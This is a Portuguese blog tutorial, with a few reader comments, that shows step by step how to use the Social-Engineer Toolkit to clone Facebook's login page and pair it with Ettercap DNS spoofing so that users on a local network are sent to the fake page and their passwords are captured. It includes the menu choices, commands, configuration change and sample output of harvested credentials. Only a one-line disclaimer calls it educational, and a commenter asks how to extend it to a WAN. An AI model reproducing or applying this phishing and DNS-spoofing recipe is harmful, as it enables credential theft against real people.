Galera hoje iremos aprender a clonar uma pagina web com o SET e
capturar as credenciais de um cliente, o SET é um avançado conjunto de
ferramentas desenvolvidas para usar em rede sociais assistida por computador.
Esta ferramenta ajuda a preparar o caminho mais eficaz para explorar o lado do
cliente através de vulnerabilidades de aplicativos e fazer capturas de
informações confidenciais do alvo (por exemplo, senhas de e-mail). Alguns dos
os métodos de ataque mais eficiente e útil empregado pela SET incluem, alvo
phishing e-mails com um arquivo anexo malicioso, ataques applet Java, baseados
em navegador, exploração reunindo credenciais de website, criação de mídia
infecciosas e portátil (USB /DVD / CD), ataques de e-mail em massa e outros
semelhantes vetores múltiplos de ataque web. Esta combinação de métodos de
ataque fornece uma plataforma poderosa para utilizar e selecionar a técnica
mais persuasiva que poderia realizar um ataque contra os humanos.
Iremos utilizar o Backtrack 5 para esse exemplo, pois ele já vem com o
SET e o Ettercap que também iremos utilizar.
# cd /pentest/exploits/set
# ./set-update
Agora execute o SET.
# ./set
Você sera advertido que o Set foi migrado para o GitHub e não usa mais
svn então você sera questionado se quer que o Git seja intalado automaticamente
ou se quer fazer uma instalação manual, selecione 1 pra automático e depois Yes
para instalar o Git. Depois do Git ser instalado saia do diretório e entre
novamente. Depois execute o Set novamente.
# ./set
Você terá que concorda com os termos de licença, selecione y e
prossiga.
Depois disso ira aparecer as
seguintes opções no terminal:
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration
Testing
3) Third Party Modules
4) Update the Metasploit
Framework
5) Update the Social-Engineer
Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer
Toolkit
set>
Selecione a opção 1 (Social-Engineering Attacks)
Depois ira aparecer outra lista de opções:
1) Spear-Phishing Attack
Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and
Listener
5) Mass Mailer Attack
6) Arduino-Based Attack
Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point
Attack Vector
9) QRCode Generator Attack
Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main
menu.
set>
Selecione a opção 2 (Website Attack Vectors)
Agora ira aparecer outra lista de opções:
1) Java Applet Attack Method
2) Metasploit Browser Exploit
Method
3) Credential Harvester
Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle
Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a
CodeSigning Certificate
99) Return to Main Menu
set:webattack>
Selecione a opção 3 (Credential Harvester Attack Method)
Agora ira aparecer outra lista de opções:
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>
Selecione a opção 2 (Site Cloner)
Depois você será questionado sobre qual ip ele ira ser executado,
informe o ip de sua eth0, no meu caso foi 192.168.5.186.
set:webattack> IP address for the POST back in
Harvester/Tabnabbing:192.168.5.186
Agora o Set vai perguntar qual o site que você deseja clonar, como o
ataque é para roubo de credencial não faz sentido clonar site que não tenha
login e senha, no caso coloquei o facebook.
set:webattack> Enter the url to clone:http://www.facebook.com
Pronto agora ele ja ta com a pagina no ar esperando a vitima, coloque
o ip que você informou acima no navegador e veja se vai aparecer a pagina do
facebook.
Agora não faz sentido terminar por aqui, pois ninguém vai acessar seu
ip e vai colocar informações sigilosas atoa pra você, então precisamos combinar
esse ataque com o dns spoofing que vimos no post passado, para quem não viu
segue o link:
Só precisamos mudar uma coisa, no arquivo etter.dns no campos onde
informamos o ip para onde o cliente será redirecionado iremos colocar o ip do
atacante, no meu caso 192.168.5.186, rode o ettercap em outro terminal.
Agora para fazer o teste tente acessar o site do facebook em algum
host da rede, ao digitar facebook.com.br no navegador você será redirecionado
para o ip do atacante, ai é só colocar os dados de acesso pra testar.
Veja que tanto na tela do Set quanto na tela do ettercap você vai ver
a senha capturada, abaixo a saída da tela do Set:
[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a
website.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
192.168.5.199 - - [11/Feb/2013 02:15:34] "GET / HTTP/1.1"
200 -
[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVpPrHLr
PARAM: display=
PARAM: legacy_return=1
PARAM: return_session=0
PARAM: trynum=1
PARAM: charset_test=€,´,€,´,水,Д,Є
PARAM: timezone=120
PARAM: lgnrnd=200534_NGNe
PARAM: lgnjs=1360556135
POSSIBLE USERNAME FIELD FOUND: email=guiadoti@teste.com
POSSIBLE PASSWORD FIELD FOUND: pass=olha_a_senha_aqui
PARAM: default_persistent=0
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
Abaixo a saida da tela do Ettercap:
Activating dns_spoof plugin...
dns_spoof: [www.facebook.com.br] spoofed to [192.168.5.186]
DHCP: [192.168.5.1] ACK : 0.0.0.0 255.255.255.0 GW 192.168.5.1 DNS
192.168.5.1
HTTP : 192.168.5.186:80 -> USER: guiadoti@teste.com
PASS: olha_a_senha_aqui INFO: http://www.facebook.com.br/
Bem galera mais uma vez cuidado com esse conhecimento, estamos mostrando
para fins didáticos, não é pra ninguém sair por ai fazendo besteira com isso,
ate a próxima.
Este comentário foi removido pelo autor.
ResponderExcluirBom dia, parece muito interessante este tipo de ataque. Pergunto se é possivel por isto a funcionar para uma WAN ao invés de uma LAN.
ResponderExcluirObrigado.
Este comentário foi removido pelo autor.
Excluir